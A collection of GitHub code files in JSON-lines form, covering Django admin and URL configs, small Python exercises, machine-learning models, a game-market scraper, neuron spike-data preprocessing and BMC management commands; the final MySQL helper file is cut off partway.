+{"seq_id":"40148398344","text":"from django.contrib import admin\n\nfrom .models import Event, Option\n\n\nclass OptionInline(admin.TabularInline):\n model = Option\n readonly_fields = (\"id\", \"created_at\")\n\n\n@admin.register(Event)\nclass EventAdmin(admin.ModelAdmin):\n readonly_fields = (\"id\", \"created_at\", \"updated_at\")\n inlines = (OptionInline,)\n fieldsets = (\n (\n None,\n {\n \"fields\": (\n readonly_fields,\n \"owner\",\n \"title\",\n \"description\",\n \"timezone\",\n \"optional\",\n ),\n },\n ),\n )\n add_fieldsets = (\n (\n None,\n {\n \"classes\": (\"wide\",),\n \"fields\": (\n \"owner\",\n \"title\",\n \"description\",\n \"timezone\",\n \"optional\",\n ),\n },\n ),\n )\n list_display = (\"title\", \"owner\", \"timezone\", \"optional\")\n ordering = (\"title\", \"owner\")\n search_fields = (\"title\", \"description\")\n","repo_name":"mehdy/K","sub_path":"event/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34724239215","text":"# *******************************\n# * Author: Doug Smyka *\n# * Application: Inventory *\n# * Date Created: 10.6.2020 *\n# * Date Revised: 10.7.2020 *\n# *******************************\n\n# Function for adding a new item to the inventory\ndef add_new_item(info):\n global inventory\n inventory[info[0]] = {'Quantity': info[1], 'Price': info[2], 'Description': info[3]}\n\n\n# Function for getting information from user\ndef new_item():\n global itemList\n print('item: ', end='')\n v1 = input().lower()\n itemList.append(v1)\n print('Quantity: ', end='')\n v2 = input().lower()\n print('Price: ', end='')\n v3 = input().lower()\n print('Description: ', end='')\n v4 = input().lower()\n add_new_item([v1, v2, v3, v4])\n\n\n# Function for asking user if they would like to add an item\ndef ask_user():\n add_item = True\n while add_item is True:\n print('Would you like to add an item? ', end='')\n user_response = input().lower()\n if user_response == 'yes' or user_response == 'y':\n new_item()\n else:\n add_item = False\n\n# Function to search for an item\ndef item_search():\n global inventory\n print('Please enter the item you are searching for: ', end='')\n user_response = input().lower()\n if user_response in inventory:\n print('Quantity: %(Quantity)s Price: %(Price)s Description: %(Description)s' % (inventory[user_response]))\n else:\n print('Item not in inventory')\n\n\n# Function to ask user if they want to search for an item\ndef ask_search():\n search = True\n while search is True:\n print('Would you like to search for an item in the inventory? ', end='')\n user_response = input().lower()\n if user_response == 'yes' or user_response == 'y':\n item_search()\n else:\n search = False\n\n\n# Function for printing table\ndef print_table():\n global inventory\n global itemList\n j = 0\n print('\\n******************* Inventory **********************\\n')\n for i in inventory:\n item = itemList[j]\n j += 1\n print('[%s] ' % item, end='')\n print('Quantity: %(Quantity)s Price: %(Price)s Description: %(Description)s' % (inventory[i]))\n print('\\n********************************************************\\n')\n\n\n# Function for main\ndef main():\n ask_user()\n ask_search()\n print_table()\n\n\n# Initialization\ninventory = {}\nitemList = []\n\n# Main\nmain()\n\n# EOF\n","repo_name":"smykad/inventory","sub_path":"inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5325990666","text":"from Connect4Game import Connect4Game\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Activation, Dropout\nimport numpy as np\nimport os\n\nclass DeepC4Agent():\n input_length = Connect4Game.ROW_COUNT * Connect4Game.COLUMN_COUNT * 3\n\n def __init__(self, name, load_models):\n self.name = name\n self.main_weights_file = \"models/{0}_main_weights.h5\".format(self.name)\n self.target_weights_file = \"models/{0}_target_weights.h5\".format(self.name)\n self.main_network = QNetwork(input_length = self.input_length)\n self.target_network = QNetwork(input_length = self.input_length)\n # Make the networks equal\n self.update_target_network(1)\n if load_models:\n self.load_weights_from_files()\n\n def update_target_network(self, tau):\n updated_weights = (np.array(self.main_network.model.get_weights()) * tau) + (np.array(self.target_network.model.get_weights()) * (1 - tau))\n self.target_network.model.set_weights(updated_weights)\n\n def load_weights_from_files(self):\n if os.path.exists(self.main_weights_file):\n print(\"Loading main weights\")\n self.main_network.model.load_weights(self.main_weights_file)\n if os.path.exists(self.target_weights_file):\n print(\"Loading target weights\")\n self.target_network.model.load_weights(self.target_weights_file)\n\n def save_model_weights(self):\n self.target_network.model.save_weights(self.target_weights_file)\n self.main_network.model.save_weights(self.main_weights_file)\n\nclass QNetwork():\n def __init__(self, input_length):\n self.model = Sequential()\n self.model.add(Dense(512, input_dim=input_length, activation='relu', name='fc1', use_bias=False))\n self.model.add(Dense(2048, activation='relu', name='fc2', use_bias=False))\n self.model.add(Dense(1024, activation='relu', name='fc3', use_bias=False))\n self.model.add(Dense(128, activation='relu', name='fc4', use_bias=False))\n self.model.add(Dense(Connect4Game.COLUMN_COUNT, name='fc5', use_bias=False))\n sgd = optimizers.SGD(lr=0.001)\n self.model.compile(loss='mse', optimizer=sgd, metrics=['mae'])","repo_name":"Ellebaek/c4champion","sub_path":"DeepC4Agent_keras_double.py","file_name":"DeepC4Agent_keras_double.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73630688693","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n \n # 2 layer DFS [O(n2), 36%]\n def pathSum(self, root: TreeNode, sum: int) -> int:\n if not root:\n return 0\n count = [0]\n self.dfs(root, sum, count)\n return count[0]\n \n def dfs(self, root, sum, count):\n if not root:\n return \n ###print(\"dfs:\", root.val)\n \n self.sumDown(root, sum-root.val, count)\n # self.sumDown(root.left, sum-root.val, count)\n # self.sumDown(root.right, sum-root.val, count)\n \n self.dfs(root.left, sum, count)\n self.dfs(root.right, sum, count) \n \n def sumDown(self, root, sum, count):\n if not root:\n return \n ###print(\" sumDown:\", root.val, sum)\n \n #if not root.left and not root.right: #NO, we don't only count until reaching the leaves \n if sum == 0:\n count[0] += 1\n \n if root.left:\n self.sumDown(root.left, sum-root.left.val, count)\n if root.right:\n self.sumDown(root.right, sum-root.right.val, count)\n \n \n ","repo_name":"ianlai/Note-Python","sub_path":"algo/tree/_0437_PathSum3.py","file_name":"_0437_PathSum3.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36689445702","text":"import pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nwine = pd.read_csv('https://archive.ics.uci.edu/ml/'\r\n 'machine-learning-databases/wine/wine.data',\r\n header=None)\r\nX, y = wine.iloc[:, 1:].values, wine.iloc[:, 0].values\r\n# print(np.unique(y))\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, stratify=y, random_state=0)\r\nSC = StandardScaler()\r\nX_train_std = SC.fit_transform(X_train)\r\nX_test_std = SC.transform(X_test)\r\npca = PCA()\r\nX_train_pca = pca.fit_transform(X_train_std)\r\nvar_exp = pca.explained_variance_ratio_\r\n\r\n\r\ndef plot_var_exp(var_exp):\r\n cum_var_exp = np.cumsum(var_exp)\r\n plt.figure()\r\n plt.bar(range(1, 14), var_exp, alpha=0.5, align='center', label='individual explained variance')\r\n plt.step(range(1, 14), cum_var_exp, where='mid', label='cumulative explained variance')\r\n plt.ylabel('Explained variance ratio')\r\n plt.xlabel('Principal component index')\r\n plt.legend(loc='best')\r\n plt.tight_layout()\r\n plt.show()\r\n\r\n\r\nplot_var_exp(var_exp)\r\n\r\n\r\ndef plot_scatter(c1, c2, y):\r\n plt.figure()\r\n plt.scatter(c1[y == 3], c2[y == 3], color='red')\r\n plt.scatter(c1[y == 1], c2[y == 1], color='blue')\r\n plt.scatter(c1[y == 2], c2[y == 2], color='green')\r\n plt.legend(loc='best')\r\n plt.tight_layout()\r\n plt.show()\r\n\r\n\r\nplot_scatter(X_train_pca[:, 0], X_train_pca[:, 1], y_train)\r\n\r\npca = PCA(n_components=2)\r\nX_train_pca = pca.fit_transform(X_train_std)\r\nX_test_pca = pca.transform(X_test_std)\r\n\r\nlr = LogisticRegression()\r\nlr = lr.fit(X_train_pca, y_train)\r\n\r\nfrom matplotlib.colors import ListedColormap\r\n\r\n\r\ndef plot_decision_regions(X, y, classifier, resolution=0.02):\r\n # setup marker generator and color map\r\n markers = ('s', 'x', 'o', '^', 'v')\r\n colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\r\n cmap = ListedColormap(colors[:len(np.unique(y))])\r\n\r\n # plot the decision surface\r\n x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\r\n x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\r\n xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\r\n np.arange(x2_min, x2_max, resolution))\r\n Z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\r\n Z = Z.reshape(xx1.shape)\r\n plt.contourf(xx1, xx2, Z, alpha=0.4, cmap=cmap)\r\n plt.xlim(xx1.min(), xx1.max())\r\n plt.ylim(xx2.min(), xx2.max())\r\n\r\n # plot class samples\r\n for idx, cl in enumerate(np.unique(y)):\r\n plt.scatter(x=X[y == cl, 0],\r\n y=X[y == cl, 1],\r\n alpha=0.6,\r\n c=cmap(idx),\r\n edgecolor='black',\r\n marker=markers[idx],\r\n label=cl)\r\n plt.xlabel('x1')\r\n plt.ylabel('x2')\r\n plt.legend(loc='lower left')\r\n plt.tight_layout()\r\n # plt.savefig('images.png', dpi=300)\r\n plt.show()\r\n\r\n\r\nplot_decision_regions(X_train_pca, y_train, classifier=lr)\r\n\r\nplot_decision_regions(X_test_pca, y_test, classifier=lr)\r\n\r\n# below code shows how we use LDA to reduce dimension and build a LR classifier\r\nlda = LDA(n_components=2)\r\nX_train_lda = lda.fit_transform(X_train_std, y_train)\r\nlr = LogisticRegression()\r\nlr = lr.fit(X_train_lda, y_train)\r\nX_test_lda = lda.transform(X_test_std)\r\nplot_decision_regions(X_train_lda, y_train, classifier=lr)\r\nplot_decision_regions(X_test_lda, y_test, classifier=lr)","repo_name":"Qinghua88/machine-learning","sub_path":"PCA_LDA_linear.py","file_name":"PCA_LDA_linear.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2591288066","text":"s = input()\r\nt = input()\r\nfinal = \"\"\r\nisS = True\r\nnum = 0\r\nfor i in range(len(s)):\r\n if s[i] == t[i]:\r\n final += s[i]\r\n else:\r\n num += 1\r\n if isS:\r\n final += s[i]\r\n isS = False\r\n else:\r\n final += t[i]\r\n isS = True\r\nif num % 2 == 0:\r\n print(final)\r\nelse:\r\n print(\"impossible\")","repo_name":"strcoder4007/codeforces","sub_path":"545-B/545-B-11176632.py","file_name":"545-B-11176632.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"1529157707","text":"import argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nimport numpy as np\n\nclass Generator(nn.Module):\n def __init__(self, ngf=32):\n super(Generator, self).__init__()\n # input is 3 x 32 x 128 x 128 (duplicated by 3 x 1 x 128 x 128)\n\n self.downConv1 = nn.Conv3d(5, ngf,(3, 4, 4), stride=(1, 2, 2), padding=(1, 1, 1),bias=False)\n self.downConv2 = nn.Conv3d(ngf, ngf *2 ,(4, 4, 4), stride=(2, 2, 2), padding=(1, 1, 1),bias=False)\n self.downConv3 = nn.Conv3d(ngf *2, ngf * 4, 4, 2, 1, bias=False)\n self.downConv4 = nn.Conv3d(ngf * 4, ngf * 8, 4, 2, 1, bias=False)\n self.downConv5 = nn.Conv3d(ngf * 8, ngf * 16, 4, 2, 1, bias=False)\n self.downConv6 = nn.Conv3d(ngf * 16, ngf * 16, (2, 4, 4), stride=(1, 1, 1), padding=(0, 0, 0), bias=False)\n\n # get\n self.downBN2 = nn.BatchNorm3d(ngf * 2)\n self.downBN3 = nn.BatchNorm3d(ngf * 4)\n self.downBN4 = nn.BatchNorm3d(ngf * 8)\n self.downBN5 = nn.BatchNorm3d(ngf * 16)\n self.relu = nn.ReLU(inplace = True)\n\n self.upConv1 = nn.ConvTranspose3d(ngf * 16, ngf * 16, (2,4,4), stride=(1, 1, 1), padding=(0, 0, 0), bias=False )\n self.upConv2 = nn.ConvTranspose3d(ngf * 16, ngf * 8, 4, 2, 1, bias=False)\n self.upConv3 = nn.ConvTranspose3d(ngf * 8, ngf * 4, 4, 2, 1, bias=False)\n self.upConv4 = nn.ConvTranspose3d(ngf * 4, ngf * 2, 4, 2, 1, bias=False)\n self.upConv5 = nn.ConvTranspose3d(ngf * 2, ngf * 1, (4,4,4), stride=(2, 2, 2), padding=(1, 1, 1), bias=False)\n self.upConv6 = nn.ConvTranspose3d(ngf * 1, 3, (3,4,4), stride=(1, 2, 2), padding=(1, 1, 1), bias=False)\n\n\n self.upBN1 = nn.BatchNorm3d(ngf * 16)\n self.upBN2 = nn.BatchNorm3d(ngf * 8)\n self.upBN3 = nn.BatchNorm3d(ngf * 4)\n self.upBN4 = nn.BatchNorm3d(ngf * 2)\n self.upBN5 = nn.BatchNorm3d(ngf * 1)\n\n self.tanh = nn.Tanh()\n self.lrelu = nn.LeakyReLU(0.2, inplace=True)\n\n def forward(self, x):\n downx1 = self.downConv1(x)\n downx2 = self.downConv2(downx1)\n downx2 = self.downBN2(downx2)\n downx2 = self.lrelu(downx2)\n downx3 = self.downConv3(downx2)\n downx3 = self.downBN3(downx3)\n downx3 = self.lrelu(downx3)\n downx4 = self.downConv4(downx3)\n downx4 = self.downBN4(downx4)\n downx4 = self.lrelu(downx4)\n downx5 = self.downConv5(downx4)\n downx5 = self.downBN5(downx5)\n downx5 = self.lrelu(downx5)\n downx6 = self.downConv6(downx5)\n\n upx1 = self.upConv1(downx6)\n upx1 = self.upBN1(upx1)\n upx1 = self.relu(upx1)\n upx1 = downx5 + upx1\n\n upx2 = self.upConv2(upx1)\n upx2 = self.upBN2(upx2)\n upx2 = self.relu(upx2)\n upx2 = downx4 + upx2\n\n upx3 = self.upConv3(upx2)\n upx3 = self.upBN3(upx3)\n upx3 = self.relu(upx3)\n upx3 = downx3 + upx3\n\n upx4 = self.upConv4(upx3)\n upx4 = self.upBN4(upx4)\n upx4 = self.relu(upx4)\n upx4 = downx2 + upx4\n\n upx5 = self.upConv5(upx4)\n upx5 = self.upBN5(upx5)\n upx5 = self.relu(upx5)\n upx5 = downx1 + upx5\n\n upx6 = self.upConv6(upx5)\n upx6 = self.tanh(upx6)\n\n return upx6\n\nclass Discriminator(nn.Module):\n def __init__(self, ndf=32):\n super(Discriminator, self).__init__()\n self.main = nn.Sequential(\n # input is 3 x 32 x 256 x 256\n nn.Conv3d(5, ndf,(3, 4, 4), stride=(1, 2, 2), padding=(1, 1, 1),bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n # ndf x 32 x 64 x 64\n nn.Conv3d(ndf, ndf *2 ,(4, 4, 4), stride=(2, 2, 2), padding=(1, 1, 1),bias=False),\n nn.BatchNorm3d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n # (ndf*2) x 16 x 32 x 32\n nn.Conv3d(ndf *2, ndf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm3d(ndf * 4),\n nn.LeakyReLU(0.2, inplace=True),\n # (ndf*4) x 8 x 16 x 16\n nn.Conv3d(ndf * 4, ndf * 8, 4, 2, 1, bias=False),\n nn.BatchNorm3d(ndf * 8),\n nn.LeakyReLU(0.2, inplace=True),\n # (ndf*8) x 4 x 8 x 8\n nn.Conv3d(ndf * 8, ndf * 16, 4, 2, 1, bias=False),\n nn.BatchNorm3d(ndf * 16),\n nn.LeakyReLU(inplace=True),\n # (ndf*16) x 2 x 4 x 4\n nn.Conv3d(ndf * 16, 1, (2, 4, 4), stride=(1, 1, 1), padding=(0, 0, 0), bias=False),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n return self.main(x)\n","repo_name":"kult0922/Animating-Cloud-Images-with-Flow-Style-Transfer","sub_path":"models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4771,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"37029970115","text":"import sqlite3\nfrom io import StringIO\nimport json\n\nimport csv\n\nimport time\n\nimport pandas as pd\nimport requests\n\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}\n\n# Any URL that gives a .cvs file should work with the below function\neve_echoes_market_url = 'https://api.eve-echoes-market.com/market-stats/stats.csv'\n\nitem_url = 'https://api.eve-echoes-market.com/market-stats/'\n\n\n# Provide a URL that gives a .csv file and the name of the table in your database to add it to.\ndef download_csv(url, database_table_name):\n\n # Opens the database connection with the given database name. if the name is not found it will make one\n database_connection = sqlite3.connect('EE_Historical_Market.db')\n\n # Downloads the raw text of the given url - Not sure if this is the way your supposed to do this\n csv_text = requests.get(url, headers=headers).text\n\n # Converts the string into a pandas data table - again not sure if you should do this but it works\n df = pd.read_csv(StringIO(csv_text), sep=\",\")\n\n # Save the file to a csv file using pandas - could probly just save the file instead of converting then saving\n df.to_csv(f'{database_table_name}.csv')\n\n with database_connection:\n # Use pandas to add the cvs file to the database table and if it exists replace it\n # you can also use 'append' to just add it to the table\n df.to_sql(database_table_name, database_connection, if_exists='replace')\n\n database_connection.close()\n\n\ndownload_csv(eve_echoes_market_url, 'EVE ECHOES MARKET')\n\n#TODO Comment all this stuff\n\ndef get_item_data(database_connection, item_name, item_id):\n print(item_name)\n\n item_enteries = requests.get(f'{item_url}{item_id}', headers=headers).text\n\n data = json.loads(item_enteries)\n\n data_df = pd.json_normalize(data)\n\n with database_connection:\n # Use pandas to add the cvs file to the database table and if it exists replace it\n # you can also use 'append' to just add it to the table\n data_df.to_sql(item_name, database_connection, if_exists='append')\n\n remove_duplicates(database_connection, item_name)\n\ndef update_all_items():\n\n start_time = time.time()\n\n database_connection = sqlite3.connect('EE_Historical_Market.db')\n\n csv_text = requests.get(eve_echoes_market_url, headers=headers).text\n\n df = pd.read_csv(StringIO(csv_text), sep=\",\")\n\n csv_file = open('Market Data Lookup.csv')\n\n csv_dict = csv.DictReader(csv_file)\n\n lookup_dict = {}\n\n for row in csv_dict:\n lookup_dict[int(row['ID'])] = {'main_category': row['Main Category'], 'sub_category': row['Sub Category']}\n\n csv_file.close()\n \n for index, row in df.iterrows():\n\n item_id = df.at[index, 'item_id']\n name_str = df.at[index, 'name'].replace(' ', '_').replace(\"'\", '').replace('-', '_').replace(':', '')\n item_name = name_str.replace('.', '').replace('(', '_').replace(')', '')\n\n get_item_data(database_connection, item_name, item_id)\n\n try:\n\n category = lookup_dict[item_id]['main_category']\n\n if category == 'Manufacturing Materials' or category == 'Pilot Service':\n\n get_csv_from_database(database_connection, item_name)\n\n print(item_name)\n\n except KeyError as e:\n print(f'Couldnt find id {e}')\n\n with database_connection:\n # Use pandas to add the cvs file to the database table and if it exists replace it\n # you can also use 'append' to just add it to the table\n df.to_sql('TABLE_NAME', database_connection, if_exists='replace')\n\n database_connection.close()\n\n finish_time = time.time()\n\n total_time = finish_time - start_time\n\n print(f'Finished all items in {total_time}seconds or {total_time/60}min')\n\n\n\ndef remove_duplicates(database_connection, table_name):\n \n cursor = database_connection.cursor()\n \n query = f'DELETE FROM {table_name} WHERE rowid NOT IN (SELECT min(rowid) FROM {table_name} GROUP BY time)'\n \n cursor.execute(query)\n\n\n\ndef get_csv_from_database(database_connection, table_name):\n\n query = f'SELECT * FROM {table_name}'\n\n df = pd.read_sql_query(query, database_connection)\n\n df.to_csv(f'csv_files/{table_name}.csv')\n\n try:\n\n df.to_csv(f'/var/www/html/csv_files/{table_name}.csv')\n\n except FileNotFoundError as e:\n print(e)\n\n\n\nlast_run = 0\n\nwhile True:\n if time.time() - last_run >= 86400:\n update_all_items()\n last_run = time.time()\n \n else:\n time.sleep(1)\n","repo_name":"shilerhobbs/WebScrapePractice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34832202373","text":"from typing import Tuple\n\nfrom django.contrib.auth.models import User\nfrom esi.models import Token\n\nfrom allianceauth.authentication.models import CharacterOwnership\nfrom allianceauth.eveonline.models import EveCharacter, EveCorporationInfo\nfrom allianceauth.tests.auth_utils import AuthUtils\nfrom app_utils.testing import add_new_token\n\nfrom ..models import Owner\n\n\ndef create_owner(character_id, corporation_id):\n _, character_ownership = create_user_from_evecharacter(character_id)\n corp = (\n EveCorporationInfo.objects.get(corporation_id=corporation_id)\n if corporation_id\n else None\n )\n return Owner.objects.create(character=character_ownership, corporation=corp)\n\n\ndef create_user_from_evecharacter(character_id: int) -> Tuple[User, CharacterOwnership]:\n auth_character = EveCharacter.objects.get(character_id=character_id)\n user = AuthUtils.create_user(auth_character.character_name)\n user = AuthUtils.add_permission_to_user_by_name(\"blueprints.basic_access\", user)\n user = AuthUtils.add_permission_to_user_by_name(\n \"blueprints.add_corporate_blueprint_owner\", user\n )\n user = AuthUtils.add_permission_to_user_by_name(\n \"blueprints.add_personal_blueprint_owner\", user\n )\n user = AuthUtils.add_permission_to_user_by_name(\"blueprints.manage_requests\", user)\n character_ownership = add_character_to_user(\n user,\n auth_character,\n is_main=True,\n scopes=[\n \"esi-assets.read_assets.v1\",\n \"esi-assets.read_corporation_assets.v1\",\n \"esi-characters.read_blueprints.v1\",\n \"esi-corporations.read_blueprints.v1\",\n \"esi-industry.read_character_jobs.v1\",\n \"esi-industry.read_corporation_jobs.v1\",\n \"esi-universe.read_structures.v1\",\n ],\n )\n return user, character_ownership\n\n\ndef add_character_to_user(\n user: User,\n character: EveCharacter,\n is_main: bool = False,\n scopes: list = None,\n) -> CharacterOwnership:\n if not scopes:\n scopes = \"publicData\"\n\n token = add_new_token(user, character, scopes)\n token.save()\n if is_main:\n user.profile.main_character = character\n user.profile.save()\n user.save()\n\n return CharacterOwnership.objects.get(user=user, character=character)\n\n\ndef scope_names_set(token: Token) -> set:\n return set(token.scopes.values_list(\"name\", flat=True))\n","repo_name":"staropera/aa-blueprints","sub_path":"blueprints/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25851788183","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 27 15:23:56 2019\n\n@author: Antoine\n\"\"\"\n\n#%% import this first and set the repository to the PCA_monkey project\n\nfrom scipy.io import loadmat\nimport os\nimport pandas as pd\nimport glob\nimport numpy as np\n\n\ndef extract(x):\n \"\"\"returns the spikes of a given dataframe row in a convenient way. The\n data are originally encoded as strings in the files.\n ---\n Return \n \n An array containing the spike times as floats64\n \"\"\"\n x = x.split(sep=\", \")\n x[0] = x[0][1:]\n x[-1] = x[-1][:-1]\n \n return np.array(x, dtype=np.float64)\n\n#%% extracting files from matlab encoding\n\nglobal_path = \"data/\"\n\nfor macaque in glob.glob(global_path + \"/r*\"):\n \n path_to_glob = os.path.join(macaque, \"prefront\", \"r*.mat\")\n \n for file_name in glob.glob(path_to_glob):\n data = loadmat(file_name)[\"result\"]\n \n #f1 extraction\n f1 = []\n for trial in range(1, len(data)):\n f1.append(data[trial,3][0,0])\n \n #trial extraction\n trials = []\n for trial in range(1, len(data)):\n trials.append(data[trial,1][0,0])\n \n #spikes extraction\n spikes = []\n for trial in range(1, len(data)):\n temp = []\n for measure in range(data[trial,5].shape[1]):\n for time in data[trial,5][0,measure][0]:\n temp.append(time)\n temp.sort()\n spikes.append(temp)\n\n\n clean = pd.DataFrame({\"trial\":trials, \"f1\":f1, \"spikes\":spikes})\n clean.to_csv(\"C:/Users/Antoi/pca_monkey/clean_data/\" + \n file_name[-14:-4] + \".txt\")\n \n\n#%% aggregating the repetitive files to have only 1 file per neuron\n \npath = \"clean_data/\"\n\nfor file_name in glob.glob(path+ \"R*\"):\n \n #taking the neuron name -1 string to check if multiple files for 1 neuron\n neuron_name = file_name[-14:-5] \n path_to_glob = os.path.join(path, neuron_name+\"?.txt\")\n \n if len(glob.glob(path_to_glob))>1 and file_name[-5]==\"1\":\n file_list = glob.glob(path_to_glob)\n data = pd.read_csv(file_list[0], index_col=0)\n \n #just taking the other files to concatenate them\n for file in file_list[1:]:\n temp = pd.read_csv(file)\n data = pd.concat((data, temp), ignore_index=True)\n os.remove(file)\n \n os.remove(file_name)\n data.to_csv(file_list[0][:-8]+\".txt\")\n\n#changing names of remaining files \nfor file_name in glob.glob(path+ \"R*_001.txt\"):\n neuron_name = file_name[-14:-8]\n destination = os.path.join(\"clean_data/\", neuron_name+\".txt\")\n source = os.path.join(\"clean_data/\", file_name[-14:])\n os.rename(source, destination)\n\n#%% transforming the time data into spike counts for each neuron\n\nold_path = \"clean_data/\"\nnew_path = \"count_data/\"\n\nfrequencies = [10, 14, 18, 24,30,34] \nbin_size = 500\nmax_length = 10000\nbins = [[i*bin_size, (i+1)*bin_size] for i in range(int(max_length/bin_size))]\n\nfor file_name in glob.glob(old_path+ \"R*\"):\n data = pd.read_csv(file_name, index_col=0)\n \n #checking if all frequencies are tested\n ok = True\n for freq in frequencies:\n if freq not in data.f1.unique():\n ok = False\n \n if ok:\n new = {\"f1\":[], \"count\":[]}\n \n for freq in frequencies:\n new[\"f1\"].append(freq)\n temp = data[data.f1==freq]\n temp = temp.reset_index()\n \n all_spikes = np.empty((0))\n for trial in range(len(temp)):\n all_spikes = np.concatenate((all_spikes,extract(temp.at[trial,\"spikes\"])))\n \n count = np.zeros(len(bins))\n for time in all_spikes:\n for index, ith_bin in enumerate(bins):\n if ith_bin[0]/', views.delete, name='delete'),\n path('entry/', views.entry, name='entry'),\n path('/', views.read),\n]","repo_name":"bramz/thoth","sub_path":"entries/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"12342142639","text":"def veoh_download(url, output_dir = '.', merge = False, info_only = False, **kwargs):\n '''Get item_id'''\n if re.match(r'http://www.veoh.com/watch/\\w+', url):\n item_id = match1(url, r'http://www.veoh.com/watch/(\\w+)')\n elif re.match(r'http://www.veoh.com/m/watch.php\\?v=\\.*', url):\n item_id = match1(url, r'http://www.veoh.com/m/watch.php\\?v=(\\w+)')\n else:\n raise NotImplementedError('Cannot find item ID')\n veoh_download_by_id(item_id, output_dir = '.', merge = False, info_only = info_only, **kwargs)\n\n","repo_name":"YangsenChen/Prompt4SE","sub_path":"milestone1/visualization/python/pythonCode/veohDl.py","file_name":"veohDl.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15424839682","text":"from bmcmanager.commands.base import BMCManagerServerCommand, BMCManagerServerGetCommand\n\n\nclass Get(BMCManagerServerGetCommand):\n \"\"\"\n print server RAM\n \"\"\"\n\n oob_method = \"system_ram\"\n\n\nclass Check(BMCManagerServerCommand):\n \"\"\"\n check server RAM [Nagios]\n \"\"\"\n\n oob_method = \"check_ram\"\n\n def get_parser(self, prog_name):\n parser = super().get_parser(prog_name)\n parser.add_argument(\n \"--expected\",\n type=int,\n default=None,\n help=\"gb of RAM the server should have\",\n )\n return parser\n","repo_name":"grnet/BMCManager","sub_path":"bmcmanager/commands/ram.py","file_name":"ram.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"23503407425","text":"\r\n# Tools for managing the building of quick lookup tables\r\n\r\nimport MySQLdb\r\nimport sys, string\r\nimport Config\r\n\r\nclass Quick( ) :\r\n\r\n\tdef __init__( self, db, cursor ) :\r\n\t\tself.db = db\r\n\t\tself.cursor = cursor\r\n\t\tself.goDefs = self.fetchGODefinitionHash( )\r\n\t\tself.goEvidence = self.fetchGOEvidenceHash( )\r\n\t\t\r\n\tdef fetchOrganismHash( self ) :\r\n\t\t\r\n\t\tself.cursor.execute( \"SELECT * FROM \" + Config.DB_QUICK + \".quick_organisms\" )\r\n\t\t\r\n\t\torganismHash = { }\r\n\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\torganismHash[str(row[0])] = row\r\n\t\t\t\r\n\t\treturn organismHash\r\n\t\t\r\n\tdef fetchUniprotOrganismHash( self ) :\r\n\t\t\r\n\t\tself.cursor.execute( \"SELECT * FROM \" + Config.DB_QUICK + \".quick_uniprot_organisms\" )\r\n\t\t\r\n\t\torganismHash = { }\r\n\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\torganismHash[str(row[0])] = row\r\n\t\t\t\r\n\t\treturn organismHash\t\r\n\r\n\tdef fetchRefseqOrganismHash( self ) :\r\n\t\t\r\n\t\tself.cursor.execute( \"SELECT * FROM \" + Config.DB_QUICK + \".quick_refseq_organisms\" )\r\n\t\t\r\n\t\torganismHash = { }\r\n\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\torganismHash[str(row[0])] = 